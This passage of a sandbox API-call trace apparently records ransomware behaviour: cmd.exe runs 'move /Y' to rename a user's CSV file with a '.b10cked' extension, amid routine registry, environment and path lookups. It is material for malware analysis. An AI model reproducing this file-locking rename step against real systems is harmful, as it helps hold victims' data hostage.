phkResult=0x2cfe94*=0x0) returned 0x2 [0232.500] VirtualQuery (in: lpAddress=0x2cfecb, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.500] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.500] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0232.500] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.501] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfe64, dwLength=0x1c | out: lpBuffer=0x2cfe64*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0232.501] GetConsoleOutputCP () returned 0x1b5 [0232.719] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.719] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.719] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.720] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.720] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.720] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.720] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.720] GetEnvironmentStringsW () returned 0x4c0250* [0232.721] FreeEnvironmentStringsW (penv=0x4c0250) returned 1 [0232.721] GetEnvironmentStringsW () returned 0x4c0250* [0232.721] FreeEnvironmentStringsW (penv=0x4c0250) returned 1 [0232.721] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee04 | out: phkResult=0x2cee04*=0x40) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x0, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x0, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegCloseKey (hKey=0x40) returned 0x0 [0232.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cee04 | out: phkResult=0x2cee04*=0x40) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x40, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x1, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x0, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x9, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.721] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x4, lpData=0x2cee10*=0x9, lpcbData=0x2cee08*=0x4) returned 0x0 [0232.722] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cee0c, lpData=0x2cee10, lpcbData=0x2cee08*=0x1000 | out: lpType=0x2cee0c*=0x0, lpData=0x2cee10*=0x9, lpcbData=0x2cee08*=0x1000) returned 0x2 [0232.722] RegCloseKey (hKey=0x40) returned 0x0 [0232.722] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.722] srand (_Seed=0x5b8863c0) [0232.722] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"" [0232.722] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"" [0232.722] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.722] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c19b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.722] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.722] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.722] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.722] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.722] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.723] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.723] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.723] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.723] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.723] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.723] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.723] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.723] GetEnvironmentStringsW () returned 0x4c23a0* [0232.723] FreeEnvironmentStringsW (penv=0x4c23a0) returned 1 [0232.723] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.723] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.723] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.723] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.723] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.723] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.723] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.723] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.723] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.723] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.723] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfbd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.723] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfbd0, lpFilePart=0x2cfbcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfbcc*="Desktop") returned 0x18 [0232.723] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.723] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf94c | out: lpFindFileData=0x2cf94c) returned 0x4c00e0 [0232.724] FindClose (in: hFindFile=0x4c00e0 | out: hFindFile=0x4c00e0) returned 1 [0232.724] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf94c | out: lpFindFileData=0x2cf94c) returned 0x4c00e0 [0232.724] FindClose (in: hFindFile=0x4c00e0 | out: hFindFile=0x4c00e0) returned 1 [0232.724] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf94c | out: lpFindFileData=0x2cf94c) returned 0x4c00e0 [0232.724] FindClose (in: hFindFile=0x4c00e0 | out: hFindFile=0x4c00e0) returned 1 [0232.724] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.724] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.724] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.724] GetEnvironmentStringsW () returned 0x4c2bc0* [0232.724] FreeEnvironmentStringsW (penv=0x4c2bc0) returned 1 [0232.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.725] GetConsoleOutputCP () returned 0x1b5 [0232.725] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.725] GetUserDefaultLCID () returned 0x409 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfd10, cchData=128 | out: lpLCData="0") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfd10, cchData=128 | out: lpLCData="0") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfd10, cchData=128 | out: lpLCData="1") returned 2 [0232.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.726] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.726] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.727] GetConsoleTitleW (in: lpConsoleTitle=0x4b0960, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.727] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.727] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.727] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.727] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.728] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.728] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.728] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.728] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.728] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.728] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.728] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.732] GetConsoleTitleW (in: lpConsoleTitle=0x2cfa08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.733] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.733] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.733] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.733] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.733] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.733] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.733] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.733] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.733] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.733] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.733] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.733] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.733] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.733] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.733] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.733] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.733] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.733] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.733] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.735] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.735] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.735] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf7c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf7bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf7bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.735] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.736] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.736] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.736] _wcsicmp (_String1="GOL7OX~1.CSV", _String2=".") returned 57 [0232.736] _wcsicmp (_String1="GOL7OX~1.CSV", _String2="..") returned 57 [0232.736] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\gol7ox~1.csv")) returned 0x20 [0232.737] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c20f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.737] SetErrorMode (uMode=0x0) returned 0x0 [0232.737] SetErrorMode (uMode=0x1) returned 0x0 [0232.737] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", nBufferLength=0x104, lpBuffer=0x2cf14c, lpFilePart=0x2cf134 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", lpFilePart=0x2cf134*="GOL7OX~1.CSV") returned 0x48 [0232.737] SetErrorMode (uMode=0x0) returned 0x1 [0232.737] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x12 [0232.737] _wcsicmp (_String1="GOL7OX~1.CSV", _String2=".") returned 57 [0232.737] _wcsicmp (_String1="GOL7OX~1.CSV", _String2="..") returned 57 [0232.737] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\gol7ox~1.csv")) returned 0x20 [0232.737] SetErrorMode (uMode=0x0) returned 0x0 [0232.737] SetErrorMode (uMode=0x1) returned 0x0 [0232.737] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", nBufferLength=0x104, lpBuffer=0x2cf5c8, lpFilePart=0x2cf360 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", lpFilePart=0x2cf360*="GOL7OX~1.CSV") returned 0x48 [0232.737] SetErrorMode (uMode=0x0) returned 0x1 [0232.737] SetErrorMode (uMode=0x0) returned 0x0 [0232.737] SetErrorMode (uMode=0x1) returned 0x0 [0232.737] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", nBufferLength=0x104, lpBuffer=0x2cf7d0, lpFilePart=0x2cf360 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", lpFilePart=0x2cf360*="g ol7OxwE18leXod.csv.b10cked") returned 0x58 [0232.737] SetErrorMode (uMode=0x0) returned 0x1 [0232.737] SetLastError (dwErrCode=0x0) [0232.738] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\g ol7oxwe18lexod.csv.b10cked")) returned 0xffffffff [0232.738] GetLastError () returned 0x2 [0232.738] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", fInfoLevelId=0x1, lpFindFileData=0x2cecdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cecdc) returned 0x4c2308 [0232.738] FindNextFileW (in: hFindFile=0x4c2308, lpFindFileData=0x2cecdc | out: lpFindFileData=0x2cecdc) returned 0 [0232.738] GetLastError () returned 0x12 [0232.738] FindClose (in: hFindFile=0x4c2308 | out: hFindFile=0x4c2308) returned 1 [0232.740] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV", fInfoLevelId=0x1, lpFindFileData=0x4c1e98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1e98) returned 0x4c2308 [0232.740] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", nBufferLength=0x104, lpBuffer=0x2cef74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked", lpFilePart=0x0) returned 0x58 [0232.740] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv", nBufferLength=0x104, lpBuffer=0x2cef74, lpFilePart=0x0 | out: 